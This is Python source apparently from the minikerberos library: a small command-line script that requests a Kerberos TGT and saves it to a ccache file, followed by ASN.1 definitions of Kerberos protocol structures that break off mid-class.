import asyncio
from minikerberos.common.url import KerberosClientURL, kerberos_url_help_epilog
from minikerberos.aioclient import AIOKerberosClient

async def amain(args):
	cu = KerberosClientURL.from_url(args.kerberos_connection_url)
	ccred = cu.get_creds()
	target = cu.get_target()

	logging.debug('Getting TGT')
	
	client = AIOKerberosClient(ccred, target)
	await client.get_TGT()
	client.ccache.to_file(args.ccache)	
	logging.info('Done!')


def main():
	import argparse
	
	parser = argparse.ArgumentParser(description='Polls the kerberos service for a TGT for the sepcified user', formatter_class=argparse.RawDescriptionHelpFormatter, epilog = kerberos_url_help_epilog)
	parser.add_argument('kerberos_connection_url', help='the kerberos target string. ')
	parser.add_argument('ccache', help='ccache file to store the TGT ticket in')
	parser.add_argument('-v', '--verbose', action='count', default=0)
	
	args = parser.parse_args()
	if args.verbose == 0:
		logging.basicConfig(level=logging.INFO)
	elif args.verbose == 1:
		logging.basicConfig(level=logging.DEBUG)
	else:
		logging.basicConfig(level=1)
	
	asyncio.run(amain(args))
	
	
if __name__ == '__main__':
	main()


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

# Sources used:
# https://zeroshell.org/kerberos/kerberos-operation/
# https://tools.ietf.org/html/rfc4120
# https://tools.ietf.org/html/rfc6113 (FAST extension)

# TODO:
# https://tools.ietf.org/html/rfc4556

from asn1crypto import core
import enum
import os

# KerberosV5Spec2 DEFINITIONS EXPLICIT TAGS ::=
TAG = 'explicit'

# class
UNIVERSAL = 0
APPLICATION = 1
CONTEXT = 2
krb5_pvno = 5 #-- current Kerberos protocol version number

class PADATA_TYPE(core.Enumerated):
	_map = {
		0   : 'NONE', #(0),
		1   : 'TGS-REQ', #(1), #		1   : 'AP-REQ', #(1),
		2   : 'ENC-TIMESTAMP', #(2),
		3   : 'PW-SALT', #(3),
		5   : 'ENC-UNIX-TIME', #(5),
		6   : 'SANDIA-SECUREID', #(6),
		7   : 'SESAME', #(7),
		8   : 'OSF-DCE', #(8),
		9   : 'CYBERSAFE-SECUREID', #(9),
		10  : 'AFS3-SALT', #(10),
		11  : 'ETYPE-INFO', #(11),
		12  : 'SAM-CHALLENGE', #(12), -- ', #(sam/otp)
		13  : 'SAM-RESPONSE', #(13), -- ', #(sam/otp)
		14  : 'PK-AS-REQ-19', #(14), -- ', #(PKINIT-19)
		15  : 'PK-AS-REP-19', #(15), -- ', #(PKINIT-19)
		15  : 'PK-AS-REQ-WIN', #(15), -- ', #(PKINIT - old number)
		16  : 'PK-AS-REQ', #(16), -- ', #(PKINIT-25)
		17  : 'PK-AS-REP', #(17), -- ', #(PKINIT-25)
		18  : 'PA-PK-OCSP-RESPONSE', #(18),
		19  : 'ETYPE-INFO2', #(19),
		20  : 'USE-SPECIFIED-KVNO', #(20),
		20  : 'SVR-REFERRAL-INFO', #(20), --- old ms referral number
		21  : 'SAM-REDIRECT', #(21), -- ', #(sam/otp)
		22  : 'GET-FROM-TYPED-DATA', #(22),
		23  : 'SAM-ETYPE-INFO', #(23),
		25  : 'SERVER-REFERRAL', #(25),
		24  : 'ALT-PRINC', #(24),		-- ', #(crawdad@fnal.gov)
		30  : 'SAM-CHALLENGE2', #(30),		-- ', #(kenh@pobox.com)
		31  : 'SAM-RESPONSE2', #(31),		-- ', #(kenh@pobox.com)
		41  : 'PA-EXTRA-TGT', #(41),			-- Reserved extra TGT
		102 : 'TD-KRB-PRINCIPAL', #(102),	-- PrincipalName
		104 : 'PK-TD-TRUSTED-CERTIFIERS', #(104), -- PKINIT
		105 : 'PK-TD-CERTIFICATE-INDEX', #(105), -- PKINIT
		106 : 'TD-APP-DEFINED-ERROR', #(106),	-- application specific
		107 : 'TD-REQ-NONCE', #(107),		-- INTEGER
		108 : 'TD-REQ-SEQ', #(108),		-- INTEGER
		128 : 'PA-PAC-REQUEST', #(128),	-- jbrezak@exchange.microsoft.com
		129 : 'PA-FOR-USER', #(129),		-- MS-KILE
		130 : 'FOR-X509-USER', #(130),		-- MS-KILE
		131 : 'FOR-CHECK-DUPS', #(131),	-- MS-KILE
		132 : 'AS-CHECKSUM', #(132),		-- MS-KILE
		132 : 'PK-AS-09-BINDING', #(132),	-- client send this to -- tell KDC that is supports -- the asCheckSum in the --  PK-AS-REP
		133 : 'CLIENT-CANONICALIZED', #(133),	-- referals
		133 : 'FX-COOKIE', #(133),		-- krb-wg-preauth-framework
		134 : 'AUTHENTICATION-SET', #(134),	-- krb-wg-preauth-framework
		135 : 'AUTH-SET-SELECTED', #(135),	-- krb-wg-preauth-framework
		136 : 'FX-FAST', #(136),		-- krb-wg-preauth-framework
		137 : 'FX-ERROR', #(137),		-- krb-wg-preauth-framework
		138 : 'ENCRYPTED-CHALLENGE', #(138),	-- krb-wg-preauth-framework
		141 : 'OTP-CHALLENGE', #(141),		-- ', #(gareth.richards@rsa.com)
		142 : 'OTP-REQUEST', #(142),		-- ', #(gareth.richards@rsa.com)
		143 : 'OTP-CONFIRM', #(143),		-- ', #(gareth.richards@rsa.com)
		144 : 'OTP-PIN-CHANGE', #(144),	-- ', #(gareth.richards@rsa.com)
		145 : 'EPAK-AS-REQ', #(145),
		146 : 'EPAK-AS-REP', #(146),
		147 : 'PKINIT-KX', #(147),		-- krb-wg-anon
		148 : 'PKU2U-NAME', #(148),		-- zhu-pku2u
		149 : 'REQ-ENC-PA-REP', #(149),	--
		151 : 'SPAKE', #(151),	https://datatracker.ietf.org/doc/draft-ietf-kitten-krb-spake-preauth/?include_text=1
		165 : 'SUPPORTED-ETYPES', #(165)	-- MS-KILE
		167 : 'PA-PAC-OPTIONS',
	}
	
class AUTHDATA_TYPE(core.Enumerated):
	_map = {
		1 : 'IF-RELEVANT', #1),
		2 : 'INTENDED-FOR-SERVER', #2),
		3 : 'INTENDED-FOR-APPLICATION-CLASS', #3),
		4 : 'KDC-ISSUED', #4),
		5 : 'AND-OR', #5),
		6 : 'MANDATORY-TICKET-EXTENSIONS', #6),
		7 : 'IN-TICKET-EXTENSIONS', #7),
		8 : 'MANDATORY-FOR-KDC', #8),
		9 : 'INITIAL-VERIFIED-CAS', #9),
		64 : 'OSF-DCE', #64),
		65 : 'SESAME', #65),
		66 : 'OSF-DCE-PKI-CERTID', #66),
		70 : 'AD-authentication-strength',
		71 : 'AD-fx-fast-armor',
		72 : 'AD-fx-fast-used',
		128 : 'WIN2K-PAC', #128),
		129 : 'GSS-API-ETYPE-NEGOTIATION', #129), -- Authenticator only
		-17 : 'SIGNTICKET-OLDER', #-17),
		142 : 'SIGNTICKET-OLD', #142),
		512 : 'SIGNTICKET', #512)
	}

class CKSUMTYPE(core.Enumerated):
	_map = {
		0 : 'NONE', #0),
		1 : 'CRC32', #1),
		2 : 'RSA_MD4', #2),
		3 : 'RSA_MD4_DES', #3),
		4 : 'DES_MAC', #4),
		5 : 'DES_MAC_K', #5),
		6 : 'RSA_MD4_DES_K', #6),
		7 : 'RSA_MD5', #7),
		8 : 'RSA_MD5_DES', #8),
		9 : 'RSA_MD5_DES3', #9),
		10 : 'SHA1_OTHER', #10),
		12 : 'HMAC_SHA1_DES3', #12),
		14 : 'SHA1', #14),
		15 : 'HMAC_SHA1_96_AES_128', #15),
		16 : 'HMAC_SHA1_96_AES_256', #16),
		0x8003 : 'GSSAPI', #0x8003),
		-138 : 'HMAC_MD5', #-138),	-- unofficial microsoft number
		-1138 : 'HMAC_MD5_ENC', #-1138)	-- even more unofficial
	}

#enctypes
class ENCTYPE(core.Enumerated):
	_map = {
		0 : 'NULL', #0),
		1 : 'DES_CBC_CRC', #1),
		2 : 'DES_CBC_MD4', #2),
		3 : 'DES_CBC_MD5', #3),
		5 : 'DES3_CBC_MD5', #5),
		7 : 'OLD_DES3_CBC_SHA1', #7),
		8 : 'SIGN_DSA_GENERATE', #8),
		9 : 'ENCRYPT_RSA_PRIV', #9),
		10 : 'ENCRYPT_RSA_PUB', #10),
		16 : 'DES3_CBC_SHA1', #16),	-- with key derivation
		17 : 'AES128_CTS_HMAC_SHA1_96', #17),
		18 : 'AES256_CTS_HMAC_SHA1_96', #18),
		23 : 'ARCFOUR_HMAC_MD5', #23),
		24 : 'ARCFOUR_HMAC_MD5_56', #24),
		48 : 'ENCTYPE_PK_CROSS', #48),
		#-- some "old" windows types
		-128 : 'ARCFOUR_MD4', #-128),
		-133 : 'ARCFOUR_HMAC_OLD', #-133),
		-135 : 'ARCFOUR_HMAC_OLD_EXP', #-135),
		#-- these are for Heimdal internal use
		-0x1000 : 'DES_CBC_NONE', #-0x1000),
		-0x1001 : 'DES3_CBC_NONE', #-0x1001),
		-0x1002 : 'DES_CFB64_NONE', #-0x1002),
		-0x1003 : 'DES_PCBC_NONE', #-0x1003),
		-0x1004 : 'DIGEST_MD5_NONE', #-0x1004),		-- private use, lukeh@padl.com
		-0x1005 : 'CRAM_MD5_NONE', #-0x1005)		-- private use, lukeh@padl.com
	}
	
class SequenceOfEnctype(core.SequenceOf):
	_child_spec = core.Integer

class Microseconds(core.Integer):
	"""    ::= INTEGER (0..999999)
	-- microseconds
    """      
class krb5int32 (core.Integer):
    """krb5int32  ::= INTEGER (-2147483648..2147483647)
    """


class krb5uint32 (core.Integer):
    """krb5uint32  ::= INTEGER (0..4294967295)
    """

class KerberosString(core.GeneralString):
	"""KerberosString ::= GeneralString (IA5String)
	For compatibility, implementations MAY choose to accept GeneralString
	values that contain characters other than those permitted by
	IA5String...
	"""
	
class SequenceOfKerberosString(core.SequenceOf):
	_child_spec = KerberosString
	
# https://github.com/tiran/kkdcpasn1/blob/asn1crypto/pykkdcpasn1.py
class Realm(KerberosString):
	"""Realm ::= KerberosString
	"""

	
# https://github.com/tiran/kkdcpasn1/blob/asn1crypto/pykkdcpasn1.py
class PrincipalName(core.Sequence):
	"""PrincipalName for KDC-REQ-BODY and Ticket
	PrincipalName ::= SEQUENCE {
		name-type	[0] Int32,
		name-string  [1] SEQUENCE OF KerberosString
	}
	"""
	_fields = [
		('name-type', krb5int32, {'tag_type': TAG, 'tag': 0}),
		('name-string', SequenceOfKerberosString, {'tag_type': TAG, 'tag': 1}),
	]
	
	
class Principal(core.Sequence):
	_fields = [
		('name', PrincipalName, {'tag_type': TAG, 'tag': 0}),
		('realm', Realm, {'tag_type': TAG, 'tag': 1}),
	]

	
class Principals(core.SequenceOf):
	_child_spec = Principal

	
class HostAddress(core.Sequence):
    """HostAddress for HostAddresses
    HostAddress ::= SEQUENCE {
        addr-type        [0] Int32,
        address  [1] OCTET STRING
    }
    """
    _fields = [
        ('addr-type', krb5int32, {'tag_type': TAG, 'tag': 0}),
        ('address', core.OctetString, {'tag_type': TAG, 'tag': 1}),
]


class HostAddresses(core.SequenceOf):
	"""SEQUENCE OF HostAddress
	"""
	_child_spec = HostAddress
	
	
class KerberosTime(core.GeneralizedTime):
    """KerberosTime ::= GeneralizedTime
    """

	
class AuthorizationDataElement(core.Sequence):
	_fields = [
        ('ad-type', krb5int32, {'tag_type': TAG, 'tag': 0}),
        ('ad-data', core.OctetString, {'tag_type': TAG, 'tag': 1}),
	]

	
class AuthorizationData(core.SequenceOf):
	"""SEQUENCE OF HostAddress
	"""
	_child_spec = AuthorizationDataElement
	

class APOptions(core.BitString):
	_map = {
		0 : 'reserved', #(0),
		1 : 'use-session-key', #(1),
		2 : 'mutual-required', #(2)
	}

	
class TicketFlags(core.BitString):
	_map = {
		0: 'reserved',
		1: 'forwardable',
		2: 'forwarded',
		3: 'proxiable',
		4: 'proxy',
		5: 'may-postdate',
		6: 'postdated',
		7: 'invalid',
		8: 'renewable',
		9: 'initial',
		10: 'pre-authent',
		11: 'hw-authent',
		12: 'transited-policy-checked',
		13: 'ok-as-delegate',
		14: 'anonymous',
		15: 'enc-pa-rep'
	}


class KDCOptions(core.BitString):
	_map = {
		0: 'reserved',
		1: 'forwardable',
		2: 'forwarded',
		3: 'proxiable',
		4: 'proxy',
		5: 'allow-postdate',
		6: 'postdated',
		7: 'unused7',
		8: 'renewable',
		9: 'unused9',
		10: 'unused10',
		11: 'opt-hardware-auth',
		12: 'unused12',
		13: 'unused13',
		14: 'constrained-delegation', #-- cname-in-addl-tkt (14) 
		15: 'canonicalize',
		16: 'request-anonymous',
		17: 'unused17',
		18: 'unused18',
		19: 'unused19',
		20: 'unused20',
		21: 'unused21',
		22: 'unused22',
		23: 'unused23',
		24: 'unused24',
		25: 'unused25',
		26: 'disable-transited-check',
		27: 'renewable-ok',
		28: 'enc-tkt-in-skey',
		30: 'renew',
		31: 'validate',
	}

class LR_TYPE(core.Enumerated):
	_map = {
		0 : 'NONE', #0),		-- no information
		1 : 'INITIAL_TGT', #1),	-- last initial TGT request
		2 : 'INITIAL', #2),		-- last initial request
		3 : 'ISSUE_USE_TGT', #3),	-- time of newest TGT used
		4 : 'RENEWAL', #4),		-- time of last renewal
		5 : 'REQUEST', #5),		-- time of last request ', #of any type)
		6 : 'PW_EXPTIME', #6),	-- expiration time of password
		7 : 'ACCT_EXPTIME', #7)	-- expiration time of account
	}
	
class LastReqInner(core.Sequence):
	_fields = [
		('lr-type', krb5int32, {'tag_type': TAG, 'tag': 0}), #LR_TYPE
		('lr-value', KerberosTime, {'tag_type': TAG, 'tag': 1}),
	]

class LastReq(core.SequenceOf):
	_child_spec = LastReqInner


class EncryptedData(core.Sequence):
	_fields = [
		('etype', krb5int32, {'tag_type': TAG, 'tag': 0}), #-- EncryptionType
		('kvno', krb5uint32, {'tag_type': TAG, 'tag': 1, 'optional': True}), #
		('cipher', core.OctetString, {'tag_type': TAG, 'tag': 2}), #ciphertext
	]


class EncryptionKey(core.Sequence):
	_fields = [
		('keytype', krb5uint32, {'tag_type': TAG, 'tag': 0}), #-- EncryptionType
		('keyvalue', core.OctetString, {'tag_type': TAG, 'tag': 1}), #
	]


#-- encoded Transited field

class TransitedEncoding(core.Sequence):
	_fields = [
		('tr-type', krb5uint32, {'tag_type': TAG, 'tag': 0}), #-- must be registered
		('contents', core.OctetString, {'tag_type': TAG, 'tag': 1}), #
	]



# https://github.com/tiran/kkdcpasn1/blob/asn1crypto/pykkdcpasn1.py
class Ticket(core.Sequence):
	explicit = (APPLICATION,1)
	
	_fields = [
		('tkt-vno', krb5int32, {'tag_type': TAG, 'tag': 0}),
		('realm', Realm, {'tag_type': TAG, 'tag': 1}),
		('sname', PrincipalName, {'tag_type': TAG, 'tag': 2}),
		('enc-part', EncryptedData, {'tag_type': TAG, 'tag': 3}), #EncTicketPart
	]
	
class SequenceOfTicket(core.SequenceOf):
	"""SEQUENCE OF Ticket for KDC-REQ-BODY
	"""
	_child_spec = Ticket


#-- Encrypted part of ticket
class EncTicketPart(core.Sequence):
	explicit = (APPLICATION, 3)
	
	_fields = [
		('flags', TicketFlags, {'tag_type': TAG, 'tag': 0}),
		('key', EncryptionKey, {'tag_type': TAG, 'tag': 1}),
		('crealm', Realm, {'tag_type': TAG, 'tag': 2}),
		('cname', PrincipalName, {'tag_type': TAG, 'tag': 3}),
		('transited', TransitedEncoding, {'tag_type': TAG, 'tag': 4}),
		('authtime', KerberosTime, {'tag_type': TAG, 'tag': 5}),
		('starttime', KerberosTime, {'tag_type': TAG, 'tag': 6, 'optional': True}),
		('endtime', KerberosTime, {'tag_type': TAG, 'tag': 7}),
		('renew-till', KerberosTime, {'tag_type': TAG, 'tag': 8, 'optional': True}),
		('caddr', HostAddresses, {'tag_type': TAG, 'tag': 9, 'optional': True}),
		('authorization-data', AuthorizationData, {'tag_type': TAG, 'tag': 10, 'optional': True}),
	]


class Checksum(core.Sequence):
	_fields = [
		('cksumtype', krb5int32, {'tag_type': TAG, 'tag': 0}), #CKSUMTYPE
		('checksum', core.OctetString, {'tag_type': TAG, 'tag': 1}),
	]


class Authenticator(core.Sequence):
	explicit = (APPLICATION,2)
	
	_fields = [
		('authenticator-vno', krb5int32, {'tag_type': TAG, 'tag': 0}),
		('crealm', Realm, {'tag_type': TAG, 'tag': 1}),
		('cname', PrincipalName, {'tag_type': TAG, 'tag': 2}),
		('cksum', Checksum, {'tag_type': TAG, 'tag': 3, 'optional': True}),
		('cusec', krb5int32, {'tag_type': TAG, 'tag': 4}),
		('ctime', KerberosTime, {'tag_type': TAG, 'tag': 5}),
		('subkey', EncryptionKey, {'tag_type': TAG, 'tag': 6, 'optional': True}),
		('seq-number', krb5uint32, {'tag_type': TAG, 'tag': 7, 'optional': True}),
		('authorization-data', AuthorizationData, {'tag_type': TAG, 'tag': 8, 'optional': True}),
	]


class PA_DATA(core.Sequence): #!!!! IT STARTS AT ONE!!!!
	_fields = [
		('padata-type', core.Integer, {'tag_type': TAG, 'tag': 1}),
		('padata-value', core.OctetString, {'tag_type': TAG, 'tag': 2}),
	]
	
class ETYPE_INFO_ENTRY(core.Sequence):
	_fields = [
		('etype', krb5int32, {'tag_type': TAG, 'tag': 0}),
		('salt', core.OctetString, {'tag_type': TAG, 'tag': 1, 'optional': True}),
		('salttype', krb5int32, {'tag_type': TAG, 'tag': 2, 'optional': True}),
	]

class ETYPE_INFO(core.SequenceOf):
	_child_spec = ETYPE_INFO_ENTRY


class ETYPE_INFO2_ENTRY(core.Sequence):
	_fields = [
		('etype', krb5int32, {'tag_type': TAG, 'tag': 0}),
		('salt', KerberosString, {'tag_type': TAG, 'tag': 1, 'optional': True}),
		('s2kparams', core.OctetString, {'tag_type': TAG, 'tag': 2, 'optional': True}),
	]
	
class ETYPE_INFO2(core.SequenceOf):
	_child_spec = ETYPE_INFO2_ENTRY

class METHOD_DATA(core.SequenceOf):
	_child_spec = PA_DATA


class TypedData(core.Sequence):
	_fields = [
		('data-type', krb5int32, {'tag_type': TAG, 'tag': 0}),
		('data-value', core.OctetString, {'tag_type': TAG, 'tag': 1, 'optional': True}),
	]

"""
class TYPED-DATA ::= SEQUENCE SIZE (1..MAX) OF TypedData
"""


class KDC_REQ_BODY(core.Sequence):
	_fields = [
		('kdc-options', KDCOptions, {'tag_type': TAG, 'tag': 0}),
		('cname', PrincipalName, {'tag_type': TAG, 'tag': 1, 'optional': True}),
		('realm', Realm, {'tag_type': TAG, 'tag': 2}),
		('sname', PrincipalName , {'tag_type': TAG, 'tag': 3, 'optional': True}),
		('from', KerberosTime , {'tag_type': TAG, 'tag': 4, 'optional': True}),
		('till', KerberosTime , {'tag_type': TAG, 'tag': 5, 'optional': True}),
		('rtime', KerberosTime , {'tag_type': TAG, 'tag': 6, 'optional': True}),
		('nonce', krb5int32 , {'tag_type': TAG, 'tag': 7}),
		('etype', SequenceOfEnctype , {'tag_type': TAG, 'tag': 8}), # -- EncryptionType,preference order
		('addresses', HostAddresses , {'tag_type': TAG, 'tag': 9, 'optional': True}),
		('enc-authorization-data', EncryptedData , {'tag_type': TAG, 'tag': 10, 'optional': True}), #-- Encrypted AuthorizationData encoding
		('additional-tickets', SequenceOfTicket , {'tag_type': TAG, 'tag': 11, 'optional': True}),
	
	]

class KDC_REQ(core.Sequence):
	_fields = [
		('pvno', krb5int32, {'tag_type': TAG, 'tag': 1}),
		('msg-type', krb5int32, {'tag_type': TAG, 'tag': 2}), #MESSAGE_TYPE
		('padata', METHOD_DATA , {'tag_type': TAG, 'tag': 3, 'optional': True}),
		('req-body', KDC_REQ_BODY , {'tag_type': TAG, 'tag': 4}),
	]


class AS_REQ(KDC_REQ):
	explicit = (APPLICATION, 10)
	
class TGS_REQ(KDC_REQ):
	explicit = (APPLICATION, 12)

class FastOptions(core.BitString):
	_map = {
		0:  'reserved',
		1:  'hide-client-names',
		2:  'critical_2', #forwarded',
		3:  'critical_3', #proxiable',
		4:  'critical_4', #proxy',
		5:  'critical_5', #may-postdate',
		6:  'critical_6', #postdated',
		7:  'critical_7', #invalid',
		8:  'critical_8', #renewable',
		9:  'critical_9', #initial',
		10: 'critical_10', #pre-authent',
		11: 'critical_11', #hw-authent',
		12: 'critical_12', #transited-policy-checked',
		13: 'critical_13', #ok-as-delegate',
		14: 'critical_14', #anonymous',
		15: 'critical_15', #enc-pa-rep',
		16: 'kdc-follow-referrals'
	}
	# error: KDC_ERR_UNKNOWN_CRITICAL_FAST_OPTIONS   93
#5.4.1.  FAST Armors

class EncryptedChallenge(EncryptedData):
	pass

class AUTHENTICATION_SET_ELEM(core.SequenceOf):
	_fields = [
		('pa-type', krb5int32, {'tag_type': TAG, 'tag': 0}),
		('pa-hint', core.OctetString, {'tag_type': TAG, 'tag': 1 , 'optional': True}),
		('pa-value', core.OctetString, {'tag_type': TAG, 'tag': 1, 'optional': True}),
	]

class AUTHENTICATION_SET(core.SequenceOf):
	_child_spec = AUTHENTICATION_SET_ELEM

class KrbFastArmor(core.Sequence):
	_fields = [
		('armor-type', krb5int32, {'tag_type': TAG, 'tag': 0}),
		('armor-value', core.OctetString, {'tag_type': TAG, 'tag': 1}),
	]


class KrbFastArmoredReq(core.Sequence):
	_fields = [
		('armor', KrbFastArmor, {'tag_type': TAG, 'tag': 0, 'optional':True}),
		('req-checksum', Checksum, {'tag_type': TAG, 'tag': 1}),
		('enc-fast-req', EncryptedData, {'tag_type': TAG, 'tag': 2}), #KrbFastReq #KEY_USAGE_FAST_REQ_CHKSUM          50 #KEY_USAGE_FAST_ENC                 51
	]

class KrbFastReq(core.Sequence):
	_fields = [
		('fast-options', FastOptions, {'tag_type': TAG, 'tag': 0}),
		('padata', METHOD_DATA, {'tag_type': TAG, 'tag': 1}),
		('req-body', KDC_REQ_BODY, {'tag_type': TAG, 'tag': 2}),
	]


class KrbFastFinished(core.Sequence):
	_fields = [
		('timestamp', KerberosTime, {'tag_type': TAG, 'tag': 0}), 
		('usec', Microseconds, {'tag_type': TAG, 'tag': 1}), 
		('crealm', Realm, {'tag_type': TAG, 'tag': 2}), 
		('cname', PrincipalName, {'tag_type': TAG, 'tag': 3}), 
		('ticket-checksum', Checksum, {'tag_type': TAG, 'tag': 4}), #KEY_USAGE_FAST_FINISHED            53

	]

class KrbFastArmoredRep(core.Sequence):
	_fields = [
		('enc-fast-rep', EncryptedData, {'tag_type': TAG, 'tag': 0}), #KrbFastResponse KEY_USAGE_FAST_REP                 52
	]

class KrbFastResponse(core.Sequence):
	_fields = [
		('padata', METHOD_DATA, {'tag_type': TAG, 'tag': 0}),
		('strengthen-key', EncryptionKey, {'tag_type': TAG, 'tag': 1, 'optional':True}),
		('finished', KrbFastFinished, {'tag_type': TAG, 'tag': 2, 'optional':True}), #KrbFastReq #KEY_USAGE_FAST_REQ_CHKSUM          50 #KEY_USAGE_FAST_ENC                 51
		('nonce', krb5uint32, {'tag_type': TAG, 'tag': 3}),
	]

#-- padata-type ::= PA-ENC-TIMESTAMP
#-- padata-value ::= EncryptedData - PA-ENC-TS-ENC

class PA_PAC_OPTIONSTypes(core.BitString):
	_map = {
			0: 'Claims',
			1: 'Branch Aware',
			2: 'Forward to Full DC',
			3: 'resource-based constrained delegation',
		}

class PA_FX_FAST_REQUEST(core.Choice):
	_alternatives = [
		('armored-data', KrbFastArmoredReq, {'explicit': (CONTEXT,0) }  ),
	]

class PA_FX_FAST_REPLY(core.Choice):
	_alternatives = [
		('armored-data', KrbFastArmoredRep, {'explicit': (CONTEXT,0) }  ),
	]



class PA_PAC_OPTIONS(core.Sequence):
	_fields = [
		('value', PA_PAC_OPTIONSTypes, {'tag_type': TAG, 'tag': 0}),
	]
	

	

class PA_ENC_TS_ENC(core.Sequence):
	_fields = [
		('patimestamp', KerberosTime, {'tag_type': TAG, 'tag': 0}), #-- client's time
		('pausec', krb5int32, {'tag_type': TAG, 'tag': 1, 'optional':True}),
	]

#-- draft-brezak-win2k-krb-authz-01
class PA_PAC_REQUEST(core.Sequence):
	_fields = [
		('include-pac', core.Boolean, {'tag_type': TAG, 'tag': 0}), #-- Indicates whether a PAC should be included or not
	]

#-- PacketCable provisioning server location, PKT-SP-SEC-I09-030728.pdf
class PROV_SRV_LOCATION(core.GeneralString):
	pass


class KDC_REP(core.Sequence):
	_fields = [
		('pvno', core.Integer, {'tag_type': TAG, 'tag': 0}),
		('msg-type', krb5int32, {'tag_type': TAG, 'tag': 1}), #MESSAGE_TYPE
		('padata', METHOD_DATA, {'tag_type': TAG, 'tag': 2, 'optional': True}),
		('crealm', Realm , {'tag_type': TAG, 'tag': 3}),
		('cname', PrincipalName , {'tag_type': TAG, 'tag': 4}),
		('ticket', Ticket , {'tag_type': TAG, 'tag': 5}),
		('enc-part', EncryptedData , {'tag_type': TAG, 'tag': 6}), #EncKDCRepPart
	]
	

class AS_REP(KDC_REP):
	#::= [APPLICATION 11] KDC-REP
	explicit = (APPLICATION, 11)
	
class TGS_REP(KDC_REP): # ::= [APPLICATION 13] KDC-REP
	explicit = (APPLICATION, 13)
	
	
class EncKDCRepPart(core.Sequence):
	_fields = [
		('key', EncryptionKey, {'tag_type': TAG, 'tag': 0}),
		('last-req', LastReq, {'tag_type': TAG, 'tag': 1}),
		('nonce', krb5int32, {'tag_type': TAG, 'tag': 2}),
		('key-expiration', KerberosTime , {'tag_type': TAG, 'tag': 3, 'optional': True}),
		('flags', TicketFlags , {'tag_type': TAG, 'tag': 4}),
		('authtime', KerberosTime , {'tag_type': TAG, 'tag': 5}),
		('starttime', KerberosTime , {'tag_type': TAG, 'tag': 6, 'optional': True}),
		('endtime', KerberosTime , {'tag_type': TAG, 'tag': 7}),
		('renew-till', KerberosTime , {'tag_type': TAG, 'tag': 8, 'optional': True}),
		('srealm', Realm , {'tag_type': TAG, 'tag': 9}),
		('sname', PrincipalName , {'tag_type': TAG, 'tag': 10}),
		('caddr', HostAddresses , {'tag_type': TAG, 'tag': 11, 'optional': True}),
		('encrypted-pa-data', METHOD_DATA , {'tag_type': TAG, 'tag': 12, 'optional': True}),
	]

class EncASRepPart(EncKDCRepPart):
	explicit = (APPLICATION, 25)
	
class EncTGSRepPart(EncKDCRepPart):
	explicit = (APPLICATION, 26)

class AP_REQ(core.Sequence):
	explicit = (APPLICATION, 14)
	_fields = [
		('pvno', krb5int32, {'tag_type': TAG, 'tag': 0}),
		('msg-type', krb5int32, {'tag_type': TAG, 'tag': 1}), #MESSAGE_TYPE
		('ap-options', APOptions, {'tag_type': TAG, 'tag': 2}),
		('ticket', Ticket , {'tag_type': TAG, 'tag': 3}),
		('authenticator', EncryptedData , {'tag_type': TAG, 'tag': 4}),
	]

class AP_REP(core.Sequence):
	explicit = (APPLICATION, 15)
	_fields = [
		('pvno', krb5int32, {'tag_type': TAG, 'tag': 0}),
		('msg-type', krb5int32, {'tag_type': TAG, 'tag': 1}),#MESSAGE_TYPE
		('enc-part', EncryptedData , {'tag_type': TAG, 'tag': 2}),
	]


class EncAPRepPart(core.Sequence):
	explicit = (APPLICATION, 27)
	_fields = [
		('ctime', KerberosTime, {'tag_type': TAG, 'tag': 0}),
		('cusec', krb5int32, {'tag_type': TAG, 'tag': 1}),
		('subkey', EncryptionKey , {'tag_type': TAG, 'tag': 2, 'optional': True}),
		('seq-number', krb5uint32 , {'tag_type': TAG, 'tag': 3, 'optional': True}),
	]


class KRB_SAFE_BODY(core.Sequence):
	_fields = [
		('user-data', core.OctetString, {'tag_type': TAG, 'tag': 0}),
		('timestamp', KerberosTime, {'tag_type': TAG, 'tag': 1, 'optional': True}),
		('usec', krb5int32 , {'tag_type': TAG, 'tag': 2, 'optional': True}),
		('seq-number', krb5uint32 , {'tag_type': TAG, 'tag': 3, 'optional': True}),
		('s-address', HostAddress , {'tag_type': TAG, 'tag': 4, 'optional': True}),
		('r-address', HostAddress , {'tag_type': TAG, 'tag': 5, 'optional': True}),
	]


class KRB_SAFE(core.Sequence):
	explicit = (APPLICATION, 20)
	_fields = [
		('pvno', krb5int32, {'tag_type': TAG, 'tag': 0}),
		('msg-type', krb5int32, {'tag_type': TAG, 'tag': 1}),#MESSAGE_TYPE
		('safe-body', KRB_SAFE_BODY , {'tag_type': TAG, 'tag': 2}),
		('cksum', Checksum , {'tag_type': TAG, 'tag': 3}),
	]

class KRB_PRIV(core.Sequence):
	explicit = (APPLICATION, 21)
	_fields = [
		('pvno', krb5int32, {'tag_type': TAG, 'tag': 0}),
		('msg-type', krb5int32, {'tag_type': TAG, 'tag': 1}),#MESSAGE_TYPE
		('enc-part', EncryptedData, {'tag_type': TAG, 'tag': 2}),
	] 


class EncKrbPrivPart(core.Sequence):
	explicit = (APPLICATION, 28)
	_fields = [
		('user-data', core.OctetString, {'tag_type': TAG, 'tag': 0}),
		('timestamp', KerberosTime, {'tag_type': TAG, 'tag': 1, 'optional': True}),
		('usec', krb5int32 , {'tag_type': TAG, 'tag': 2, 'optional': True}),
		('seq-number', krb5uint32 , {'tag_type': TAG, 'tag': 3, 'optional': True}),
		('s-address', HostAddress , {'tag_type': TAG, 'tag': 4, 'optional': True}),
		('r-address', HostAddress , {'tag_type': TAG, 'tag': 5, 'optional': True}),
	]


class KRB_CRED(core.Sequence):
	explicit = (APPLICATION, 22)
	_fields = [
		('pvno', core.Integer, {'tag_type': TAG, 'tag': 0}),
		('msg-type', core.Integer, {'tag_type': TAG, 'tag': 1}),
		('tickets', SequenceOfTicket, {'tag_type': TAG, 'tag': 2}),
		('enc-part', EncryptedData , {'tag_type': TAG, 'tag': 3}),
	
	]
	
# http://web.mit.edu/freebsd/head/crypto/heimdal/lib/asn1/krb5.asn1
class KrbCredInfo(core.Sequence):
	_fields = [
		('key', EncryptionKey, {'tag_type': TAG, 'tag': 0}),
		('prealm', Realm, {'tag_type': TAG, 'tag': 1, 'optional': True}),
		('pname', PrincipalName, {'tag_type': TAG, 'tag': 2, 'optional': True}),
		('flags', TicketFlags , {'tag_type': TAG, 'tag': 3, 'optional': True}),
		('authtime', KerberosTime , {'tag_type': TAG, 'tag': 4, 'optional': True}),
		('starttime', KerberosTime , {'tag_type': TAG, 'tag': 5, 'optional': True}),
		('endtime', KerberosTime , {'tag_type': TAG, 'tag': 6, 'optional': True}),
